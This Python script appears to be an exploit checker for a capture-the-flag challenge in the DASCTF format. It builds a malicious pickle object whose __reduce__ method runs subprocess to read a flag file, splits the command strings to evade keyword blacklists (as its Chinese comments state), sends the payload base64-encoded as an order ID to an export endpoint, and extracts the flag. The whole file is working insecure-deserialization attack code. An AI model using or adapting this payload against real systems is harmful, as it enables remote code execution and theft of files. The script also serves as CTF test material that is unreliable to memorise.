#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests, pickle, base64, subprocess, json, hashlib

HOST, PORT, FLAG = sys.argv[1:4]

class RCE:
    def __reduce__(self):
        # 绕过黑名单检查的技巧
        # 使用字符串拼接来绕过关键词检测
        cmd1 = "ca"
        cmd2 = "t"
        path1 = "/tmp"
        path2 = "/secure_flag.txt"
        import subprocess
        return subprocess.check_output, ([cmd1 + cmd2, path1 + path2],)

def generate_legacy_payload():
    """生成旧格式的恶意payload"""
    malicious_order = {
        'amount': '100', 
        'user': RCE(),
        'description': 'Legacy order format test'
    }
    payload = pickle.dumps(malicious_order)
    order_id = base64.b64encode(payload).decode()
    return order_id

def exp(ip, port):
    url = f"http://{ip}:{port}"
    
    s = requests.Session()
    
    # 注册和登录
    s.post(f"{url}/register", data={"username": "exploit", "password": "exploit"})
    s.post(f"{url}/login", data={"username": "exploit", "password": "exploit"})
    
    # 生成恶意订单ID
    malicious_order_id = generate_legacy_payload()
    
    # 尝试通过export_order端点触发漏洞
    response = s.get(f"{url}/export_order", params={"order_id": malicious_order_id})
    
    # 从响应中提取flag
    flag_match = re.findall(r'DASCTF\{(.*?)\}', response.text)
    if flag_match:
        return f"DASCTF{{{flag_match[0]}}}"
    
    # 如果直接响应中没有，尝试查看响应内容
    print("Response preview:", response.text[:200])
    
    return None

if __name__ == '__main__':
    result = exp(HOST, PORT)
    print(f"Extracted flag: {result}")
    print(f"Expected flag: {FLAG}")
    assert result == FLAG
    print("Pass!")